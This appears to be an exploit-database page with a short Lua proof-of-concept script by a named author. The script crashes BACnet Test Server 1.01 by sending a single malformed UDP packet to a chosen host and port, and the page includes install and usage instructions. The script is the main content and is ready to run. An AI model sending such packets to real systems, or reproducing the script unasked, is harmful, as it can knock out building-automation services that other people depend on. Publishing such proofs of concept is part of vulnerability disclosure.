BACnet Test Server 1.01 - Remote Denial of Service (PoC)

2021.01.04
br uromulou (BR) br
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-- Title => BACnet Test Server 1.01 - Remote Denial of Service (PoC) -- Author => Rômulo, @uromulou -- -- You need luasocket to run the exploit. -- Using luarocks : luarocks install luasocket main = function(host, port) local socket = require "socket" local udp = socket.udp() local data = "\x81\x09\xFF\xFE" print("Connecting to the server...") udp:settimeout(1) udp:setsockname("*", 0) udp:setpeername(host, port) print("Sending malicious packages...") udp:send(data) end print("=> BACnet Test Server 1.01 - Remote Denial of Service (PoC)") print("=> This was written by Rômulo, @uromulou.\n") if #arg < 2 then print("-> lua exploit.lua [HOST] [PORT]") print("-> lua exploit.lua 127.0.0.1 47808") else main(arg[1], arg[2]) end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top